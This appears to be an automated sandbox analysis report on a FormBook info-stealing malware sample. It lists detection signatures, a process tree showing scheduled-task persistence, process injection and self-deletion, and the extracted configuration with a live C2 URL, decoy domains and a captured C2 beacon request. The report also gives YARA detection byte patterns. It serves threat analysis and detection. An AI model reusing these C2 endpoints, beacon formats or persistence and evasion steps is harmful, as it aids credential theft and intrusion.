Windows Analysis Report 456yqMyHvT.exe

Overview

General Information

Sample Name: 456yqMyHvT.exe
Analysis ID: 491397
MD5: 001122f11ae95a3c00eb3e76541bc264
SHA1: 750e1254a82c6e21ab5cfba176363f0112089f65
SHA256: b25ef1151578640a5bb9e01fada60a8792fc4d3e92f3ddabf19ba4cd6d630f57
Tags: exe, Formbook
Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 456yqMyHvT.exe (PID: 6332 cmdline: 'C:\Users\user\Desktop\456yqMyHvT.exe' MD5: 001122F11AE95A3C00EB3E76541BC264)
    • schtasks.exe (PID: 6564 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\dWAzsHjHs' /XML 'C:\Users\user\AppData\Local\Temp\tmp9071.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 456yqMyHvT.exe (PID: 5188 cmdline: C:\Users\user\Desktop\456yqMyHvT.exe MD5: 001122F11AE95A3C00EB3E76541BC264)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 3040 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 2440 cmdline: /c del 'C:\Users\user\Desktop\456yqMyHvT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.themmbcollection.com/gst0/"], "decoy": ["retrokiid.com", "aoute.net", "rozkayinc.com", "botjin.link", "takipyurticikargo.com", "yowworld.com", "ladpharmacy.com", "tuonglaimaaai.xyz", "baiteying.com", "dumpstersforrehabbers.com", "nebrickface.com", "210wscottstj.info", "cavuleadershippro.com", "knoubank.com", "chefdoeuvre-delamere.com", "dcspores.com", "fzzwbjq.com", "buycialishaonlinerx.com", "brulkikkr.com", "catclubauvergne.com", "comounidad.com", "noseysneighbors.com", "binghareeb.com", "icenami.com", "xlcedd08185scea.xyz", "mapleleafdryers.com", "online-jahrescoaching.com", "reform-community.com", "mdf-panels.com", "beststorestore.com", "sxtynines.com", "diasporapath.com", "qbluedottvwdbuy.com", "simplyspringhomestead.com", "poctamontpg.com", "rebelyellcommunity.com", "sureshotimages.com", "ycdlg.com", "yhyyjx.com", "bikamobidika2.xyz", "jonotamedia.com", "kolliwebsolutions.net", "twilektalk.com", "creditcardsthinfo.com", "cecevintage.com", "sjkimtkd.com", "andrei68marketing.com", "teeupproducts.com", "tlhxj.com", "dyq365.com", "sidraracing.com", "muktirmichil.com", "desireezzplus.com", "mayabeautyproducts.com", "gateleess.net", "hngxqwozw.icu", "tenerus.info", "gxbei.com", "suachuanha.xyz", "progressivepulse.net", "zaborski.pro", "lancasterspiritco.com", "endlvl.com", "billinginfoservice.com"]}

Yara Overview

Memory Dumps

Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Strings:
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

Source: 7.2.456yqMyHvT.exe.400000.0.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 7.2.456yqMyHvT.exe.400000.0.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 7.2.456yqMyHvT.exe.400000.0.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Strings:
  • 0x17a49:$sqlite3step: 68 34 1C 7B E1
  • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a78:$sqlite3text: 68 38 2A 90 C5
  • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
  • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
Source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x162018:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x162292:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x16ddc5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x16d8b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x16dec7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x16e03f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x162caa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x16cb2c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x1639a3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x174037:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x17503a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

Found malware configuration
Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp; Malware Configuration Extractor: FormBook {"C2 list": ["www.themmbcollection.com/gst0/"], "decoy": ["retrokiid.com", "aoute.net", "rozkayinc.com", "botjin.link", "takipyurticikargo.com", "yowworld.com", "ladpharmacy.com", "tuonglaimaaai.xyz", "baiteying.com", "dumpstersforrehabbers.com", "nebrickface.com", "210wscottstj.info", "cavuleadershippro.com", "knoubank.com", "chefdoeuvre-delamere.com", "dcspores.com", "fzzwbjq.com", "buycialishaonlinerx.com", "brulkikkr.com", "catclubauvergne.com", "comounidad.com", "noseysneighbors.com", "binghareeb.com", "icenami.com", "xlcedd08185scea.xyz", "mapleleafdryers.com", "online-jahrescoaching.com", "reform-community.com", "mdf-panels.com", "beststorestore.com", "sxtynines.com", "diasporapath.com", "qbluedottvwdbuy.com", "simplyspringhomestead.com", "poctamontpg.com", "rebelyellcommunity.com", "sureshotimages.com", "ycdlg.com", "yhyyjx.com", "bikamobidika2.xyz", "jonotamedia.com", "kolliwebsolutions.net", "twilektalk.com", "creditcardsthinfo.com", "cecevintage.com", "sjkimtkd.com", "andrei68marketing.com", "teeupproducts.com", "tlhxj.com", "dyq365.com", "sidraracing.com", "muktirmichil.com", "desireezzplus.com", "mayabeautyproducts.com", "gateleess.net", "hngxqwozw.icu", "tenerus.info", "gxbei.com", "suachuanha.xyz", "progressivepulse.net", "zaborski.pro", "lancasterspiritco.com", "endlvl.com", "billinginfoservice.com"]}
Multi AV Scanner detection for submitted file
Source: 456yqMyHvT.exe; Virustotal: Detection: 32%
Source: 456yqMyHvT.exe; ReversingLabs: Detection: 33%
Yara detected FormBook
Source: Yara match; File source: 7.2.456yqMyHvT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.456yqMyHvT.exe.42633b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.456yqMyHvT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.456yqMyHvT.exe.4199f50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000000.758649360.000000000DA94000.00000040.00020000.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\dWAzsHjHs.exe; ReversingLabs: Detection: 33%
Source: 7.2.456yqMyHvT.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\456yqMyHvT.exe; Unpacked PE file: 0.2.456yqMyHvT.exe.d20000.0.unpack
Source: 456yqMyHvT.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 456yqMyHvT.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: WWAHost.pdb; source: 456yqMyHvT.exe, 00000007.00000002.800543926.0000000003270000.00000040.00020000.sdmp
Source: Binary string: WWAHost.pdbUGP; source: 456yqMyHvT.exe, 00000007.00000002.800543926.0000000003270000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP; source: 456yqMyHvT.exe, 00000007.00000002.798568898.00000000013BF000.00000040.00000001.sdmp, WWAHost.exe, 0000000F.00000002.925469842.0000000003D1F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: 456yqMyHvT.exe, 00000007.00000002.798568898.00000000013BF000.00000040.00000001.sdmp, WWAHost.exe
Source: C:\Users\user\Desktop\456yqMyHvT.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\456yqMyHvT.exe; Code function: 4x nop then push dword ptr [ebp-24h]
Source: C:\Users\user\Desktop\456yqMyHvT.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\456yqMyHvT.exe; Code function: 4x nop then xor edx, edx
Source: C:\Users\user\Desktop\456yqMyHvT.exe; Code function: 4x nop then xor edx, edx
Source: C:\Users\user\Desktop\456yqMyHvT.exe; Code function: 4x nop then push dword ptr [ebp-24h]
Source: C:\Users\user\Desktop\456yqMyHvT.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\456yqMyHvT.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\456yqMyHvT.exe; Code function: 4x nop then push dword ptr [ebp-20h]
Source: C:\Users\user\Desktop\456yqMyHvT.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\456yqMyHvT.exe; Code function: 4x nop then push dword ptr [ebp-20h]
Source: C:\Users\user\Desktop\456yqMyHvT.exe; Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\456yqMyHvT.exe; Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\456yqMyHvT.exe; Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\WWAHost.exe; Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\WWAHost.exe; Code function: 4x nop then pop edi

          Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Network Connect: 91.237.52.145 80
Source: C:\Windows\explorer.exe; Domain query: www.zaborski.pro
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.themmbcollection.com/gst0/
Source: global traffic; HTTP traffic detected: GET /gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RBnaKwy&m2M0a=aZq8yroxIb HTTP/1.1 Host: www.zaborski.pro Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmp; String found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: WWAHost.exe, 0000000F.00000002.926336110.00000000046BF000.00000004.00020000.sdmp; String found in binary or memory: https://www.zaborski.pro/gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RB
Source: unknown; DNS traffic detected: queries for: www.zaborski.pro
Source: global traffic; HTTP traffic detected: GET /gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RBnaKwy&m2M0a=aZq8yroxIb HTTP/1.1 Host: www.zaborski.pro Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 7.2.456yqMyHvT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.456yqMyHvT.exe.42633b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.456yqMyHvT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.456yqMyHvT.exe.4199f50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000000.758649360.000000000DA94000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 7.2.456yqMyHvT.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.456yqMyHvT.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.456yqMyHvT.exe.42633b0.3.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.456yqMyHvT.exe.42633b0.3.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 7.2.456yqMyHvT.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.456yqMyHvT.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.456yqMyHvT.exe.4199f50.4.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.456yqMyHvT.exe.4199f50.4.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.758649360.000000000DA94000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 456yqMyHvT.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 7.2.456yqMyHvT.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.456yqMyHvT.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
